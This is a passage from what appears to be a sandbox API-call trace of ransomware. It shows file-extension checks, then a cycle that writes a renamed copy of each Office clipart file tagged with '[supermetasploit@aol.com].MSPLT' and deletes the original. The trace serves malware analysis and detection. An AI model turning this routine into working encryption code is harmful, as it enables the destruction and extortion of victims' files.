Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.193] lstrlenW (lpString=".1cd") returned 4 [0317.193] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.193] lstrlenW (lpString=".jpg") returned 4 [0317.193] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.193] lstrlenW (lpString=".doc") returned 4 [0317.193] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0317.193] lstrlenW (lpString=".docx") returned 5 [0317.193] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0317.193] lstrlenW (lpString=".pdf") returned 4 [0317.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0317.194] lstrlenW (lpString=".xls") returned 4 [0317.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0317.194] lstrlenW (lpString=".xlsx") returned 5 [0317.194] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0317.194] lstrlenW (lpString=".ppt") returned 4 [0317.194] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0317.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.194] lstrlenW (lpString=".zip") returned 4 [0317.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0317.194] lstrlenW (lpString=".rar") returned 4 [0317.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0317.194] lstrlenW (lpString=".bz2") returned 4 [0317.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0317.194] lstrlenW (lpString=".7z") returned 3 [0317.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0317.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.194] lstrlenW (lpString=".dbf") returned 4 [0317.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0317.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.194] lstrlenW (lpString=".1cd") returned 4 [0317.194] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0317.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 67 [0317.194] lstrlenW (lpString=".jpg") returned 4 [0317.194] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0317.195] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0317.195] lstrlenW (lpString="DD00234_.WMF") returned 12 [0317.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0317.281] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=29628) returned 1 [0317.281] CloseHandle (hObject=0x544) returned 1 [0317.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf")) returned 0x220 [0317.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0317.282] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0317.282] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0317.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0317.283] GetLastError () returned 0x0 [0317.283] ReadFile (in: hFile=0x544, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x73bc, lpOverlapped=0x0) returned 1 [0317.326] WriteFile (in: hFile=0x54c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x73c0, lpOverlapped=0x0) returned 1 [0317.327] ReadFile (in: hFile=0x544, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0317.328] WriteFile (in: hFile=0x54c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0317.328] SetEndOfFile (hFile=0x54c) returned 1 [0318.193] CloseHandle (hObject=0x54c) returned 1 [0318.280] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0318.285] SetEndOfFile (hFile=0x544) returned 1 [0318.550] CloseHandle (hObject=0x544) returned 1 [0318.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0318.893] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf")) returned 1 [0319.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.265] lstrlenW (lpString=".doc") returned 4 [0319.265] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.265] lstrlenW (lpString=".docx") returned 5 [0319.265] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.265] lstrlenW (lpString=".pdf") returned 4 [0319.265] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.265] lstrlenW (lpString=".xls") returned 4 [0319.265] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.265] lstrlenW (lpString=".xlsx") returned 5 [0319.265] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.265] lstrlenW (lpString=".ppt") returned 4 [0319.266] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.266] lstrlenW (lpString=".zip") returned 4 [0319.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.266] lstrlenW (lpString=".rar") returned 4 [0319.266] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.266] lstrlenW (lpString=".bz2") returned 4 [0319.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.266] lstrlenW (lpString=".7z") returned 3 [0319.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.266] lstrlenW (lpString=".dbf") returned 4 [0319.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.266] lstrlenW (lpString=".1cd") returned 4 [0319.266] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.266] lstrlenW (lpString=".jpg") returned 4 [0319.266] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.299] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.299] lstrlenW (lpString=".doc") returned 4 [0319.300] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.300] lstrlenW (lpString=".docx") returned 5 [0319.300] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.300] lstrlenW (lpString=".pdf") returned 4 [0319.300] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.300] lstrlenW (lpString=".xls") returned 4 [0319.300] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.300] lstrlenW (lpString=".xlsx") returned 5 [0319.300] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.300] lstrlenW (lpString=".ppt") returned 4 [0319.300] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.300] lstrlenW (lpString=".zip") returned 4 [0319.300] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.300] lstrlenW (lpString=".rar") returned 4 [0319.300] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.300] lstrlenW (lpString=".bz2") returned 4 [0319.300] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.301] lstrlenW (lpString=".7z") returned 3 [0319.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.301] lstrlenW (lpString=".dbf") returned 4 [0319.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.301] lstrlenW (lpString=".1cd") returned 4 [0319.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0319.301] lstrlenW (lpString=".jpg") returned 4 [0319.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.301] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.301] lstrlenW (lpString="DD00261_.WMF") returned 12 [0319.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0319.302] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=37974) returned 1 [0319.302] CloseHandle (hObject=0x420) returned 1 [0319.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf")) returned 0x220 [0319.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0319.303] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.303] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0319.304] GetLastError () returned 0x0 [0319.304] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x9456, lpOverlapped=0x0) returned 1 [0319.866] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x9460, lpOverlapped=0x0) returned 1 [0319.869] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0319.869] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0319.870] SetEndOfFile (hFile=0x53c) returned 1 [0319.870] CloseHandle (hObject=0x53c) returned 1 [0319.870] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.870] SetEndOfFile (hFile=0x420) returned 1 [0319.874] CloseHandle (hObject=0x420) returned 1 [0319.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.875] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf")) returned 1 [0319.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.877] lstrlenW (lpString=".doc") returned 4 [0319.877] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.877] lstrlenW (lpString=".docx") returned 5 [0319.877] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.877] lstrlenW (lpString=".pdf") returned 4 [0319.877] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.877] lstrlenW (lpString=".xls") returned 4 [0319.877] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.877] lstrlenW (lpString=".xlsx") returned 5 [0319.877] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.877] lstrlenW (lpString=".ppt") returned 4 [0319.877] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.877] lstrlenW (lpString=".zip") returned 4 [0319.877] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.877] lstrlenW (lpString=".rar") returned 4 [0319.877] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.877] lstrlenW (lpString=".bz2") returned 4 [0319.877] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.877] lstrlenW (lpString=".7z") returned 3 [0319.877] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.877] lstrlenW (lpString=".dbf") returned 4 [0319.877] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.877] lstrlenW (lpString=".1cd") returned 4 [0319.878] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.878] lstrlenW (lpString=".jpg") returned 4 [0319.878] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.878] lstrlenW (lpString=".doc") returned 4 [0319.878] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.878] lstrlenW (lpString=".docx") returned 5 [0319.878] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.878] lstrlenW (lpString=".pdf") returned 4 [0319.878] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.878] lstrlenW (lpString=".xls") returned 4 [0319.879] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.879] lstrlenW (lpString=".xlsx") returned 5 [0319.879] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.879] lstrlenW (lpString=".ppt") returned 4 [0319.879] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.879] lstrlenW (lpString=".zip") returned 4 [0319.879] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.879] lstrlenW (lpString=".rar") returned 4 [0319.879] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.879] lstrlenW (lpString=".bz2") returned 4 [0319.879] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.879] lstrlenW (lpString=".7z") returned 3 [0319.879] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.879] lstrlenW (lpString=".dbf") returned 4 [0319.879] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.879] lstrlenW (lpString=".1cd") returned 4 [0319.879] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0319.879] lstrlenW (lpString=".jpg") returned 4 [0319.879] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.880] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.880] lstrlenW (lpString="DD00449_.WMF") returned 12 [0319.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0319.881] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=9992) returned 1 [0319.881] CloseHandle (hObject=0x420) returned 1 [0319.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf")) returned 0x220 [0319.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0319.882] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.882] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0319.883] GetLastError () returned 0x0 [0319.883] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x2708, lpOverlapped=0x0) returned 1 [0319.892] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x2710, lpOverlapped=0x0) returned 1 [0319.894] ReadFile (in: hFile=0x420, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0319.894] WriteFile (in: hFile=0x53c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0319.895] SetEndOfFile (hFile=0x53c) returned 1 [0319.895] CloseHandle (hObject=0x53c) returned 1 [0319.895] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.895] SetEndOfFile (hFile=0x420) returned 1 [0319.900] CloseHandle (hObject=0x420) returned 1 [0319.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.901] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf")) returned 1 [0319.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.902] lstrlenW (lpString=".doc") returned 4 [0319.902] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.902] lstrlenW (lpString=".docx") returned 5 [0319.902] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.902] lstrlenW (lpString=".pdf") returned 4 [0319.902] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.902] lstrlenW (lpString=".xls") returned 4 [0319.902] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.902] lstrlenW (lpString=".xlsx") returned 5 [0319.903] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.903] lstrlenW (lpString=".ppt") returned 4 [0319.903] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.903] lstrlenW (lpString=".zip") returned 4 [0319.903] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.903] lstrlenW (lpString=".rar") returned 4 [0319.903] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.903] lstrlenW (lpString=".bz2") returned 4 [0319.903] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.903] lstrlenW (lpString=".7z") returned 3 [0319.903] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.903] lstrlenW (lpString=".dbf") returned 4 [0319.903] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.903] lstrlenW (lpString=".1cd") returned 4 [0319.903] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0319.903] lstrlenW (lpString=".jpg") returned 4 